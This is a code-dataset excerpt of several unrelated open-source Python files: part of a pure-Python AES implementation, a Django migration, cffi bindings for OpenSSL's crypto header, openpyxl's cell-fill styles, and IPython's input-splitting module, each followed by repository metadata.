7 : ( 0, 1, 2, 4),
8 : ( 0, 1, 3, 4) }
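# Example (added for illustration): with Nb=4 the offsets are (0, 1, 2, 3),
# so row 1 of the state is rotated left by one column, row 2 by two and
# row 3 by three, which is exactly the FIPS-197 ShiftRows schedule.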
def ShiftRows(algInstance):
tmp = [0]*algInstance.Nb # list of size Nb
    for r in range(1,4):                  # row 0 remains unchanged and can be skipped
for c in range(algInstance.Nb):
tmp[c] = algInstance.state[(c+shiftOffset[algInstance.Nb][r]) % algInstance.Nb][r]
for c in range(algInstance.Nb):
algInstance.state[c][r] = tmp[c]
def InvShiftRows(algInstance):
tmp = [0]*algInstance.Nb # list of size Nb
    for r in range(1,4):                  # row 0 remains unchanged and can be skipped
for c in range(algInstance.Nb):
tmp[c] = algInstance.state[(c+algInstance.Nb-shiftOffset[algInstance.Nb][r]) % algInstance.Nb][r]
for c in range(algInstance.Nb):
algInstance.state[c][r] = tmp[c]
#-------------------------------------
def MixColumns(a):
Sprime = [0,0,0,0]
for j in range(a.Nb): # for each column
Sprime[0] = mul(2,a.state[j][0])^mul(3,a.state[j][1])^mul(1,a.state[j][2])^mul(1,a.state[j][3])
Sprime[1] = mul(1,a.state[j][0])^mul(2,a.state[j][1])^mul(3,a.state[j][2])^mul(1,a.state[j][3])
Sprime[2] = mul(1,a.state[j][0])^mul(1,a.state[j][1])^mul(2,a.state[j][2])^mul(3,a.state[j][3])
Sprime[3] = mul(3,a.state[j][0])^mul(1,a.state[j][1])^mul(1,a.state[j][2])^mul(2,a.state[j][3])
for i in range(4):
a.state[j][i] = Sprime[i]
def InvMixColumns(a):
""" Mix the four bytes of every column in a linear way
This is the opposite operation of Mixcolumn """
Sprime = [0,0,0,0]
for j in range(a.Nb): # for each column
Sprime[0] = mul(0x0E,a.state[j][0])^mul(0x0B,a.state[j][1])^mul(0x0D,a.state[j][2])^mul(0x09,a.state[j][3])
Sprime[1] = mul(0x09,a.state[j][0])^mul(0x0E,a.state[j][1])^mul(0x0B,a.state[j][2])^mul(0x0D,a.state[j][3])
Sprime[2] = mul(0x0D,a.state[j][0])^mul(0x09,a.state[j][1])^mul(0x0E,a.state[j][2])^mul(0x0B,a.state[j][3])
Sprime[3] = mul(0x0B,a.state[j][0])^mul(0x0D,a.state[j][1])^mul(0x09,a.state[j][2])^mul(0x0E,a.state[j][3])
for i in range(4):
a.state[j][i] = Sprime[i]
#-------------------------------------
def mul(a, b):
""" Multiply two elements of GF(2^m)
needed for MixColumn and InvMixColumn """
if (a !=0 and b!=0):
return Alogtable[(Logtable[a] + Logtable[b])%255]
else:
return 0
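# Worked example (added for illustration, matching FIPS-197 sec. 4.2):
# {57} x {13} = {fe} in GF(2^8). With the log/antilog tables below this is
# Alogtable[(Logtable[0x57] + Logtable[0x13]) % 255] == 0xFE, which is
# exactly what mul() computes.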
Logtable = ( 0, 0, 25, 1, 50, 2, 26, 198, 75, 199, 27, 104, 51, 238, 223, 3,
100, 4, 224, 14, 52, 141, 129, 239, 76, 113, 8, 200, 248, 105, 28, 193,
125, 194, 29, 181, 249, 185, 39, 106, 77, 228, 166, 114, 154, 201, 9, 120,
101, 47, 138, 5, 33, 15, 225, 36, 18, 240, 130, 69, 53, 147, 218, 142,
150, 143, 219, 189, 54, 208, 206, 148, 19, 92, 210, 241, 64, 70, 131, 56,
102, 221, 253, 48, 191, 6, 139, 98, 179, 37, 226, 152, 34, 136, 145, 16,
126, 110, 72, 195, 163, 182, 30, 66, 58, 107, 40, 84, 250, 133, 61, 186,
43, 121, 10, 21, 155, 159, 94, 202, 78, 212, 172, 229, 243, 115, 167, 87,
175, 88, 168, 80, 244, 234, 214, 116, 79, 174, 233, 213, 231, 230, 173, 232,
44, 215, 117, 122, 235, 22, 11, 245, 89, 203, 95, 176, 156, 169, 81, 160,
127, 12, 246, 111, 23, 196, 73, 236, 216, 67, 31, 45, 164, 118, 123, 183,
204, 187, 62, 90, 251, 96, 177, 134, 59, 82, 161, 108, 170, 85, 41, 157,
151, 178, 135, 144, 97, 190, 220, 252, 188, 149, 207, 205, 55, 63, 91, 209,
83, 57, 132, 60, 65, 162, 109, 71, 20, 42, 158, 93, 86, 242, 211, 171,
68, 17, 146, 217, 35, 32, 46, 137, 180, 124, 184, 38, 119, 153, 227, 165,
103, 74, 237, 222, 197, 49, 254, 24, 13, 99, 140, 128, 192, 247, 112, 7)
Alogtable= ( 1, 3, 5, 15, 17, 51, 85, 255, 26, 46, 114, 150, 161, 248, 19, 53,
95, 225, 56, 72, 216, 115, 149, 164, 247, 2, 6, 10, 30, 34, 102, 170,
229, 52, 92, 228, 55, 89, 235, 38, 106, 190, 217, 112, 144, 171, 230, 49,
83, 245, 4, 12, 20, 60, 68, 204, 79, 209, 104, 184, 211, 110, 178, 205,
76, 212, 103, 169, 224, 59, 77, 215, 98, 166, 241, 8, 24, 40, 120, 136,
131, 158, 185, 208, 107, 189, 220, 127, 129, 152, 179, 206, 73, 219, 118, 154,
181, 196, 87, 249, 16, 48, 80, 240, 11, 29, 39, 105, 187, 214, 97, 163,
254, 25, 43, 125, 135, 146, 173, 236, 47, 113, 147, 174, 233, 32, 96, 160,
251, 22, 58, 78, 210, 109, 183, 194, 93, 231, 50, 86, 250, 21, 63, 65,
195, 94, 226, 61, 71, 201, 64, 192, 91, 237, 44, 116, 156, 191, 218, 117,
159, 186, 213, 100, 172, 239, 42, 126, 130, 157, 188, 223, 122, 142, 137, 128,
155, 182, 193, 88, 232, 35, 101, 175, 234, 37, 111, 177, 200, 67, 197, 84,
252, 31, 33, 99, 165, 244, 7, 9, 27, 45, 119, 153, 176, 203, 70, 202,
69, 207, 74, 222, 121, 139, 134, 145, 168, 227, 62, 66, 198, 81, 243, 14,
18, 54, 90, 238, 41, 123, 141, 140, 143, 138, 133, 148, 167, 242, 13, 23,
57, 75, 221, 124, 132, 151, 162, 253, 28, 36, 108, 180, 199, 82, 246, 1)
|
mit
| 4,782,612,339,069,262,000
| 49.927336
| 115
| 0.547901
| false
| 2.290383
| false
| false
| false
|
Ninad998/FinalYearProject
|
deep_stylo/migrations/0001_initial.py
|
1
|
1563
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-03-24 16:30
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Result',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('doc_id', models.IntegerField()),
('authorList', models.CharField(max_length=200)),
('predicted_author', models.CharField(max_length=200, null=True)),
('train_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)),
('validation_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)),
('test_accuracy', models.DecimalField(decimal_places=10, max_digits=11, null=True)),
('test_binary', models.DecimalField(decimal_places=1, max_digits=2, null=True)),
('upload_date', models.DateTimeField(default=django.utils.timezone.now)),
('status', models.DecimalField(decimal_places=1, default=0.0, max_digits=2)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
mit
| -7,605,435,888,718,739,000
| 42.416667
| 118
| 0.627639
| false
| 4.070313
| false
| false
| false
|
Ayrx/cryptography
|
src/_cffi_src/openssl/crypto.py
|
1
|
3371
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
INCLUDES = """
#include <openssl/crypto.h>
"""
TYPES = """
static const long Cryptography_HAS_LOCKING_CALLBACKS;
static const int SSLEAY_VERSION;
static const int SSLEAY_CFLAGS;
static const int SSLEAY_PLATFORM;
static const int SSLEAY_DIR;
static const int SSLEAY_BUILT_ON;
static const int OPENSSL_VERSION;
static const int OPENSSL_CFLAGS;
static const int OPENSSL_BUILT_ON;
static const int OPENSSL_PLATFORM;
static const int OPENSSL_DIR;
static const int CRYPTO_MEM_CHECK_ON;
static const int CRYPTO_MEM_CHECK_OFF;
static const int CRYPTO_MEM_CHECK_ENABLE;
static const int CRYPTO_MEM_CHECK_DISABLE;
static const int CRYPTO_LOCK;
static const int CRYPTO_UNLOCK;
static const int CRYPTO_READ;
static const int CRYPTO_LOCK_SSL;
"""
FUNCTIONS = """
int CRYPTO_mem_ctrl(int);
int CRYPTO_is_mem_check_on(void);
void CRYPTO_mem_leaks(struct bio_st *);
"""
MACROS = """
/* CRYPTO_cleanup_all_ex_data became a macro in 1.1.0 */
void CRYPTO_cleanup_all_ex_data(void);
/* as of 1.1.0 OpenSSL does its own locking *angelic chorus*. These functions
have become macros that are no ops */
int CRYPTO_num_locks(void);
void CRYPTO_set_locking_callback(void(*)(int, int, const char *, int));
void (*CRYPTO_get_locking_callback(void))(int, int, const char *, int);
/* SSLeay was removed in 1.1.0 */
unsigned long SSLeay(void);
const char *SSLeay_version(int);
/* these functions were added to replace the SSLeay functions in 1.1.0 */
unsigned long OpenSSL_version_num(void);
const char *OpenSSL_version(int);
/* this is a macro in 1.1.0 */
void OPENSSL_free(void *);
/* This was removed in 1.1.0 */
void CRYPTO_lock(int, int, const char *, int);
"""
CUSTOMIZATIONS = """
/* In 1.1.0 SSLeay has finally been retired. We bidirectionally define the
values so you can use either one. This is so we can use the new function
names no matter what OpenSSL we're running on, but users on older pyOpenSSL
releases won't see issues if they're running OpenSSL 1.1.0 */
#if !defined(SSLEAY_VERSION)
# define SSLeay OpenSSL_version_num
# define SSLeay_version OpenSSL_version
# define SSLEAY_VERSION_NUMBER OPENSSL_VERSION_NUMBER
# define SSLEAY_VERSION OPENSSL_VERSION
# define SSLEAY_CFLAGS OPENSSL_CFLAGS
# define SSLEAY_BUILT_ON OPENSSL_BUILT_ON
# define SSLEAY_PLATFORM OPENSSL_PLATFORM
# define SSLEAY_DIR OPENSSL_DIR
#endif
#if !defined(OPENSSL_VERSION)
# define OpenSSL_version_num SSLeay
# define OpenSSL_version SSLeay_version
# define OPENSSL_VERSION SSLEAY_VERSION
# define OPENSSL_CFLAGS SSLEAY_CFLAGS
# define OPENSSL_BUILT_ON SSLEAY_BUILT_ON
# define OPENSSL_PLATFORM SSLEAY_PLATFORM
# define OPENSSL_DIR SSLEAY_DIR
#endif
#if !defined(CRYPTO_LOCK)
static const long Cryptography_HAS_LOCKING_CALLBACKS = 0;
static const long CRYPTO_LOCK = 0;
static const long CRYPTO_UNLOCK = 0;
static const long CRYPTO_READ = 0;
static const long CRYPTO_LOCK_SSL = 0;
void (*CRYPTO_lock)(int, int, const char *, int) = NULL;
#else
static const long Cryptography_HAS_LOCKING_CALLBACKS = 1;
#endif
"""
|
bsd-3-clause
| 7,430,546,441,362,209,000
| 33.397959
| 79
| 0.723821
| false
| 3.092661
| false
| false
| false
|
mfsteen/CIQTranslate-Kristian
|
openpyxl/styles/fills.py
|
1
|
5258
|
from __future__ import absolute_import
# Copyright (c) 2010-2016 openpyxl
from openpyxl.descriptors import Float, Set, Alias, NoneSet
from openpyxl.descriptors.sequence import ValueSequence
from openpyxl.compat import safe_string
from .colors import ColorDescriptor, Color
from .hashable import HashableObject
from openpyxl.xml.functions import Element, localname, safe_iterator
from openpyxl.xml.constants import SHEET_MAIN_NS
FILL_NONE = 'none'
FILL_SOLID = 'solid'
FILL_PATTERN_DARKDOWN = 'darkDown'
FILL_PATTERN_DARKGRAY = 'darkGray'
FILL_PATTERN_DARKGRID = 'darkGrid'
FILL_PATTERN_DARKHORIZONTAL = 'darkHorizontal'
FILL_PATTERN_DARKTRELLIS = 'darkTrellis'
FILL_PATTERN_DARKUP = 'darkUp'
FILL_PATTERN_DARKVERTICAL = 'darkVertical'
FILL_PATTERN_GRAY0625 = 'gray0625'
FILL_PATTERN_GRAY125 = 'gray125'
FILL_PATTERN_LIGHTDOWN = 'lightDown'
FILL_PATTERN_LIGHTGRAY = 'lightGray'
FILL_PATTERN_LIGHTGRID = 'lightGrid'
FILL_PATTERN_LIGHTHORIZONTAL = 'lightHorizontal'
FILL_PATTERN_LIGHTTRELLIS = 'lightTrellis'
FILL_PATTERN_LIGHTUP = 'lightUp'
FILL_PATTERN_LIGHTVERTICAL = 'lightVertical'
FILL_PATTERN_MEDIUMGRAY = 'mediumGray'
fills = (FILL_SOLID, FILL_PATTERN_DARKDOWN, FILL_PATTERN_DARKGRAY,
FILL_PATTERN_DARKGRID, FILL_PATTERN_DARKHORIZONTAL, FILL_PATTERN_DARKTRELLIS,
FILL_PATTERN_DARKUP, FILL_PATTERN_DARKVERTICAL, FILL_PATTERN_GRAY0625,
FILL_PATTERN_GRAY125, FILL_PATTERN_LIGHTDOWN, FILL_PATTERN_LIGHTGRAY,
FILL_PATTERN_LIGHTGRID, FILL_PATTERN_LIGHTHORIZONTAL,
FILL_PATTERN_LIGHTTRELLIS, FILL_PATTERN_LIGHTUP, FILL_PATTERN_LIGHTVERTICAL,
FILL_PATTERN_MEDIUMGRAY)
class Fill(HashableObject):
"""Base class"""
tagname = "fill"
@classmethod
def from_tree(cls, el):
children = [c for c in el]
if not children:
return
child = children[0]
if "patternFill" in child.tag:
return PatternFill._from_tree(child)
else:
return GradientFill._from_tree(child)
class PatternFill(Fill):
"""Area fill patterns for use in styles.
    Caution: if you do not specify a fill_type, other attributes will have
    no effect!"""
tagname = "patternFill"
__fields__ = ('patternType',
'fgColor',
'bgColor')
__elements__ = ('fgColor', 'bgColor')
patternType = NoneSet(values=fills)
fill_type = Alias("patternType")
fgColor = ColorDescriptor()
start_color = Alias("fgColor")
bgColor = ColorDescriptor()
end_color = Alias("bgColor")
def __init__(self, patternType=None, fgColor=Color(), bgColor=Color(),
fill_type=None, start_color=None, end_color=None):
if fill_type is not None:
patternType = fill_type
self.patternType = patternType
if start_color is not None:
fgColor = start_color
self.fgColor = fgColor
if end_color is not None:
bgColor = end_color
self.bgColor = bgColor
@classmethod
def _from_tree(cls, el):
attrib = dict(el.attrib)
for child in el:
desc = localname(child)
attrib[desc] = Color.from_tree(child)
return cls(**attrib)
def to_tree(self, tagname=None):
parent = Element("fill")
el = Element(self.tagname)
if self.patternType is not None:
el.set('patternType', self.patternType)
for c in self.__elements__:
value = getattr(self, c)
if value != Color():
el.append(value.to_tree(c))
parent.append(el)
return parent
DEFAULT_EMPTY_FILL = PatternFill()
DEFAULT_GRAY_FILL = PatternFill(patternType='gray125')
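# Minimal usage sketch (added for illustration; the Color(rgb=...) call is an
# assumption about the sibling colors module): a solid red fill needs an
# explicit fill_type, otherwise the colors are ignored, as the class
# docstring above warns.
#
#   red_fill = PatternFill(fill_type=FILL_SOLID,
#                          start_color=Color(rgb='FFFF0000'),
#                          end_color=Color(rgb='FFFF0000'))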
def _serialise_stop(tagname, sequence, namespace=None):
for idx, color in enumerate(sequence):
stop = Element("stop", position=str(idx))
stop.append(color.to_tree())
yield stop
class GradientFill(Fill):
tagname = "gradientFill"
__fields__ = ('type', 'degree', 'left', 'right', 'top', 'bottom', 'stop')
type = Set(values=('linear', 'path'))
fill_type = Alias("type")
degree = Float()
left = Float()
right = Float()
top = Float()
bottom = Float()
stop = ValueSequence(expected_type=Color, to_tree=_serialise_stop)
def __init__(self, type="linear", degree=0, left=0, right=0, top=0,
bottom=0, stop=(), fill_type=None):
self.degree = degree
self.left = left
self.right = right
self.top = top
self.bottom = bottom
self.stop = stop
if fill_type is not None:
type = fill_type
self.type = type
def __iter__(self):
for attr in self.__attrs__:
value = getattr(self, attr)
if value:
yield attr, safe_string(value)
@classmethod
def _from_tree(cls, node):
colors = []
for color in safe_iterator(node, "{%s}color" % SHEET_MAIN_NS):
colors.append(Color.from_tree(color))
return cls(stop=colors, **node.attrib)
def to_tree(self, tagname=None, namespace=None):
parent = Element("fill")
el = super(GradientFill, self).to_tree()
parent.append(el)
return parent
|
gpl-3.0
| -6,165,026,717,945,432,000
| 29.218391
| 86
| 0.63294
| false
| 3.500666
| false
| false
| false
|
sserrot/champion_relationships
|
venv/Lib/site-packages/IPython/core/inputsplitter.py
|
1
|
28155
|
"""DEPRECATED: Input handling and transformation machinery.
This module was deprecated in IPython 7.0, in favour of inputtransformer2.
The first class in this module, :class:`InputSplitter`, is designed to tell when
input from a line-oriented frontend is complete and should be executed, and when
the user should be prompted for another line of code instead. The name 'input
splitter' is largely for historical reasons.
A companion, :class:`IPythonInputSplitter`, provides the same functionality but
with full support for the extended IPython syntax (magics, system calls, etc).
The code to actually do these transformations is in :mod:`IPython.core.inputtransformer`.
:class:`IPythonInputSplitter` feeds the raw code to the transformers in order
and stores the results.
For more details, see the class docstrings below.
"""
from warnings import warn
warn('IPython.core.inputsplitter is deprecated since IPython 7 in favor of `IPython.core.inputtransformer2`',
DeprecationWarning)
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import ast
import codeop
import io
import re
import sys
import tokenize
import warnings
from IPython.core.inputtransformer import (leading_indent,
classic_prompt,
ipy_prompt,
cellmagic,
assemble_logical_lines,
help_end,
escaped_commands,
assign_from_magic,
assign_from_system,
assemble_python_lines,
)
# These are available in this module for backwards compatibility.
from IPython.core.inputtransformer import (ESC_SHELL, ESC_SH_CAP, ESC_HELP,
ESC_HELP2, ESC_MAGIC, ESC_MAGIC2,
ESC_QUOTE, ESC_QUOTE2, ESC_PAREN, ESC_SEQUENCES)
#-----------------------------------------------------------------------------
# Utilities
#-----------------------------------------------------------------------------
# FIXME: These are general-purpose utilities that later can be moved to the
# general ward. Kept here for now because we're being very strict about test
# coverage with this code, and this lets us ensure that we keep 100% coverage
# while developing.
# compiled regexps for autoindent management
dedent_re = re.compile('|'.join([
r'^\s+raise(\s.*)?$', # raise statement (+ space + other stuff, maybe)
r'^\s+raise\([^\)]*\).*$', # wacky raise with immediate open paren
r'^\s+return(\s.*)?$', # normal return (+ space + other stuff, maybe)
r'^\s+return\([^\)]*\).*$', # wacky return with immediate open paren
r'^\s+pass\s*$', # pass (optionally followed by trailing spaces)
r'^\s+break\s*$', # break (optionally followed by trailing spaces)
r'^\s+continue\s*$', # continue (optionally followed by trailing spaces)
]))
ini_spaces_re = re.compile(r'^([ \t\r\f\v]+)')
# regexp to match pure comment lines so we don't accidentally insert 'if 1:'
# before pure comments
comment_line_re = re.compile(r'^\s*\#')
def num_ini_spaces(s):
"""Return the number of initial spaces in a string.
Note that tabs are counted as a single space. For now, we do *not* support
mixing of tabs and spaces in the user's input.
Parameters
----------
s : string
Returns
-------
n : int
"""
ini_spaces = ini_spaces_re.match(s)
if ini_spaces:
return ini_spaces.end()
else:
return 0
# Fake token types for partial_tokenize:
INCOMPLETE_STRING = tokenize.N_TOKENS
IN_MULTILINE_STATEMENT = tokenize.N_TOKENS + 1
# The 2 classes below have the same API as TokenInfo, but don't try to look up
# a token type name that they won't find.
class IncompleteString:
type = exact_type = INCOMPLETE_STRING
def __init__(self, s, start, end, line):
self.s = s
self.start = start
self.end = end
self.line = line
class InMultilineStatement:
type = exact_type = IN_MULTILINE_STATEMENT
def __init__(self, pos, line):
self.s = ''
self.start = self.end = pos
self.line = line
def partial_tokens(s):
"""Iterate over tokens from a possibly-incomplete string of code.
This adds two special token types: INCOMPLETE_STRING and
IN_MULTILINE_STATEMENT. These can only occur as the last token yielded, and
represent the two main ways for code to be incomplete.
"""
readline = io.StringIO(s).readline
token = tokenize.TokenInfo(tokenize.NEWLINE, '', (1, 0), (1, 0), '')
try:
for token in tokenize.generate_tokens(readline):
yield token
except tokenize.TokenError as e:
# catch EOF error
lines = s.splitlines(keepends=True)
end = len(lines), len(lines[-1])
if 'multi-line string' in e.args[0]:
l, c = start = token.end
s = lines[l-1][c:] + ''.join(lines[l:])
yield IncompleteString(s, start, end, lines[-1])
elif 'multi-line statement' in e.args[0]:
yield InMultilineStatement(end, lines[-1])
else:
raise
def find_next_indent(code):
"""Find the number of spaces for the next line of indentation"""
tokens = list(partial_tokens(code))
if tokens[-1].type == tokenize.ENDMARKER:
tokens.pop()
if not tokens:
return 0
while (tokens[-1].type in {tokenize.DEDENT, tokenize.NEWLINE, tokenize.COMMENT}):
tokens.pop()
if tokens[-1].type == INCOMPLETE_STRING:
# Inside a multiline string
return 0
# Find the indents used before
prev_indents = [0]
def _add_indent(n):
if n != prev_indents[-1]:
prev_indents.append(n)
tokiter = iter(tokens)
for tok in tokiter:
if tok.type in {tokenize.INDENT, tokenize.DEDENT}:
_add_indent(tok.end[1])
elif (tok.type == tokenize.NL):
try:
_add_indent(next(tokiter).start[1])
except StopIteration:
break
last_indent = prev_indents.pop()
# If we've just opened a multiline statement (e.g. 'a = ['), indent more
if tokens[-1].type == IN_MULTILINE_STATEMENT:
if tokens[-2].exact_type in {tokenize.LPAR, tokenize.LSQB, tokenize.LBRACE}:
return last_indent + 4
return last_indent
if tokens[-1].exact_type == tokenize.COLON:
# Line ends with colon - indent
return last_indent + 4
if last_indent:
# Examine the last line for dedent cues - statements like return or
# raise which normally end a block of code.
last_line_starts = 0
for i, tok in enumerate(tokens):
if tok.type == tokenize.NEWLINE:
last_line_starts = i + 1
last_line_tokens = tokens[last_line_starts:]
names = [t.string for t in last_line_tokens if t.type == tokenize.NAME]
if names and names[0] in {'raise', 'return', 'pass', 'break', 'continue'}:
# Find the most recent indentation less than the current level
for indent in reversed(prev_indents):
if indent < last_indent:
return indent
return last_indent
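# Illustrative behaviour (added, not part of the original module): a trailing
# colon or a freshly opened bracket indents by four more spaces, and a
# block-ending statement dedents:
#   find_next_indent('if x:')        -> 4
#   find_next_indent('a = [')        -> 4
#   find_next_indent('    return 1') -> 0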
def last_blank(src):
"""Determine if the input source ends in a blank.
A blank is either a newline or a line consisting of whitespace.
Parameters
----------
src : string
A single or multiline string.
"""
if not src: return False
ll = src.splitlines()[-1]
return (ll == '') or ll.isspace()
last_two_blanks_re = re.compile(r'\n\s*\n\s*$', re.MULTILINE)
last_two_blanks_re2 = re.compile(r'.+\n\s*\n\s+$', re.MULTILINE)
def last_two_blanks(src):
"""Determine if the input source ends in two blanks.
A blank is either a newline or a line consisting of whitespace.
Parameters
----------
src : string
A single or multiline string.
"""
if not src: return False
# The logic here is tricky: I couldn't get a regexp to work and pass all
# the tests, so I took a different approach: split the source by lines,
# grab the last two and prepend '###\n' as a stand-in for whatever was in
# the body before the last two lines. Then, with that structure, it's
# possible to analyze with two regexps. Not the most elegant solution, but
# it works. If anyone tries to change this logic, make sure to validate
# the whole test suite first!
new_src = '\n'.join(['###\n'] + src.splitlines()[-2:])
return (bool(last_two_blanks_re.match(new_src)) or
bool(last_two_blanks_re2.match(new_src)) )
def remove_comments(src):
"""Remove all comments from input source.
Note: comments are NOT recognized inside of strings!
Parameters
----------
src : string
A single or multiline input string.
Returns
-------
String with all Python comments removed.
"""
return re.sub('#.*', '', src)
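# For instance (added for illustration): remove_comments('x = 1 # note')
# returns 'x = 1 '. As the docstring warns, a '#' inside a string is also
# stripped: remove_comments("s = '#'") returns "s = '".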
def get_input_encoding():
"""Return the default standard input encoding.
If sys.stdin has no encoding, 'ascii' is returned."""
# There are strange environments for which sys.stdin.encoding is None. We
# ensure that a valid encoding is returned.
encoding = getattr(sys.stdin, 'encoding', None)
if encoding is None:
encoding = 'ascii'
return encoding
#-----------------------------------------------------------------------------
# Classes and functions for normal Python syntax handling
#-----------------------------------------------------------------------------
class InputSplitter(object):
r"""An object that can accumulate lines of Python source before execution.
This object is designed to be fed python source line-by-line, using
:meth:`push`. It will return on each push whether the currently pushed
code could be executed already. In addition, it provides a method called
:meth:`push_accepts_more` that can be used to query whether more input
can be pushed into a single interactive block.
This is a simple example of how an interactive terminal-based client can use
this tool::
isp = InputSplitter()
while isp.push_accepts_more():
indent = ' '*isp.indent_spaces
prompt = '>>> ' + indent
line = indent + raw_input(prompt)
isp.push(line)
print 'Input source was:\n', isp.source_reset(),
"""
# A cache for storing the current indentation
# The first value stores the most recently processed source input
# The second value is the number of spaces for the current indentation
# If self.source matches the first value, the second value is a valid
# current indentation. Otherwise, the cache is invalid and the indentation
# must be recalculated.
_indent_spaces_cache = None, None
# String, indicating the default input encoding. It is computed by default
# at initialization time via get_input_encoding(), but it can be reset by a
# client with specific knowledge of the encoding.
encoding = ''
# String where the current full source input is stored, properly encoded.
# Reading this attribute is the normal way of querying the currently pushed
# source code, that has been properly encoded.
source = ''
# Code object corresponding to the current source. It is automatically
# synced to the source, so it can be queried at any time to obtain the code
# object; it will be None if the source doesn't compile to valid Python.
code = None
# Private attributes
# List with lines of input accumulated so far
_buffer = None
# Command compiler
_compile = None
# Boolean indicating whether the current block is complete
_is_complete = None
# Boolean indicating whether the current block has an unrecoverable syntax error
_is_invalid = False
def __init__(self):
"""Create a new InputSplitter instance.
"""
self._buffer = []
self._compile = codeop.CommandCompiler()
self.encoding = get_input_encoding()
def reset(self):
"""Reset the input buffer and associated state."""
self._buffer[:] = []
self.source = ''
self.code = None
self._is_complete = False
self._is_invalid = False
def source_reset(self):
"""Return the input source and perform a full reset.
"""
out = self.source
self.reset()
return out
def check_complete(self, source):
"""Return whether a block of code is ready to execute, or should be continued
This is a non-stateful API, and will reset the state of this InputSplitter.
Parameters
----------
source : string
Python input code, which can be multiline.
Returns
-------
status : str
One of 'complete', 'incomplete', or 'invalid' if source is not a
prefix of valid code.
indent_spaces : int or None
The number of spaces by which to indent the next line of code. If
status is not 'incomplete', this is None.
"""
self.reset()
try:
self.push(source)
except SyntaxError:
# Transformers in IPythonInputSplitter can raise SyntaxError,
# which push() will not catch.
return 'invalid', None
else:
if self._is_invalid:
return 'invalid', None
elif self.push_accepts_more():
return 'incomplete', self.get_indent_spaces()
else:
return 'complete', None
finally:
self.reset()
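    # Illustrative calls (added; the values follow from the logic above and
    # are not part of the original module):
    #   InputSplitter().check_complete('a = 1\n')       -> ('complete', None)
    #   InputSplitter().check_complete('for i in x:\n') -> ('incomplete', 4)
    #   InputSplitter().check_complete('a = [\n')       -> ('incomplete', 4)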
def push(self, lines:str) -> bool:
"""Push one or more lines of input.
This stores the given lines and returns a status code indicating
whether the code forms a complete Python block or not.
Any exceptions generated in compilation are swallowed, but if an
exception was produced, the method returns True.
Parameters
----------
lines : string
One or more lines of Python input.
Returns
-------
is_complete : boolean
True if the current input source (the result of the current input
plus prior inputs) forms a complete Python execution block. Note that
this value is also stored as a private attribute (``_is_complete``), so it
can be queried at any time.
"""
assert isinstance(lines, str)
self._store(lines)
source = self.source
# Before calling _compile(), reset the code object to None so that if an
# exception is raised in compilation, we don't mislead by having
# inconsistent code/source attributes.
self.code, self._is_complete = None, None
self._is_invalid = False
# Honor termination lines properly
if source.endswith('\\\n'):
return False
try:
with warnings.catch_warnings():
warnings.simplefilter('error', SyntaxWarning)
self.code = self._compile(source, symbol="exec")
# Invalid syntax can produce any of a number of different errors from
# inside the compiler, so we have to catch them all. Syntax errors
# immediately produce a 'ready' block, so the invalid Python can be
# sent to the kernel for evaluation with possible ipython
# special-syntax conversion.
except (SyntaxError, OverflowError, ValueError, TypeError,
MemoryError, SyntaxWarning):
self._is_complete = True
self._is_invalid = True
else:
# Compilation didn't produce any exceptions (though it may not have
# given a complete code object)
self._is_complete = self.code is not None
return self._is_complete
def push_accepts_more(self):
"""Return whether a block of interactive input can accept more input.
This method is meant to be used by line-oriented frontends, who need to
guess whether a block is complete or not based solely on prior and
current input lines. The InputSplitter considers it has a complete
interactive block and will not accept more input when either:
* A SyntaxError is raised
* The code is complete and consists of a single line or a single
non-compound statement
* The code is complete and has a blank line at the end
If the current input produces a syntax error, this method immediately
returns False but does *not* raise the syntax error exception, as
typically clients will want to send invalid syntax to an execution
backend which might convert the invalid syntax into valid Python via
one of the dynamic IPython mechanisms.
"""
# With incomplete input, unconditionally accept more
# A syntax error also sets _is_complete to True - see push()
if not self._is_complete:
#print("Not complete") # debug
return True
# The user can make any (complete) input execute by leaving a blank line
last_line = self.source.splitlines()[-1]
if (not last_line) or last_line.isspace():
#print("Blank line") # debug
return False
# If there's just a single line or AST node, and we're flush left, as is
# the case after a simple statement such as 'a=1', we want to execute it
# straight away.
if self.get_indent_spaces() == 0:
if len(self.source.splitlines()) <= 1:
return False
try:
code_ast = ast.parse(u''.join(self._buffer))
except Exception:
#print("Can't parse AST") # debug
return False
else:
if len(code_ast.body) == 1 and \
not hasattr(code_ast.body[0], 'body'):
#print("Simple statement") # debug
return False
# General fallback - accept more code
return True
def get_indent_spaces(self):
sourcefor, n = self._indent_spaces_cache
if sourcefor == self.source:
return n
# self.source always has a trailing newline
n = find_next_indent(self.source[:-1])
self._indent_spaces_cache = (self.source, n)
return n
# Backwards compatibility. I think all code that used .indent_spaces was
# inside IPython, but we can leave this here until IPython 7 in case any
# other modules are using it. -TK, November 2017
indent_spaces = property(get_indent_spaces)
def _store(self, lines, buffer=None, store='source'):
"""Store one or more lines of input.
If input lines are not newline-terminated, a newline is automatically
appended."""
if buffer is None:
buffer = self._buffer
if lines.endswith('\n'):
buffer.append(lines)
else:
buffer.append(lines+'\n')
setattr(self, store, self._set_source(buffer))
def _set_source(self, buffer):
return u''.join(buffer)
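# Usage sketch (added for illustration; not part of the original module):
# line-oriented frontends drive InputSplitter with push()/push_accepts_more(),
# and a blank line terminates an indented block.
#
#   isp = InputSplitter()
#   isp.push('if True:')
#   isp.push_accepts_more()   # True  -> show a continuation prompt
#   isp.push('    x = 1')
#   isp.push('')
#   isp.push_accepts_more()   # False -> the accumulated block can be executed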
class IPythonInputSplitter(InputSplitter):
"""An input splitter that recognizes all of IPython's special syntax."""
# String with raw, untransformed input.
source_raw = ''
# Flag to track when a transformer has stored input that it hasn't given
# back yet.
transformer_accumulating = False
# Flag to track when assemble_python_lines has stored input that it hasn't
# given back yet.
within_python_line = False
# Private attributes
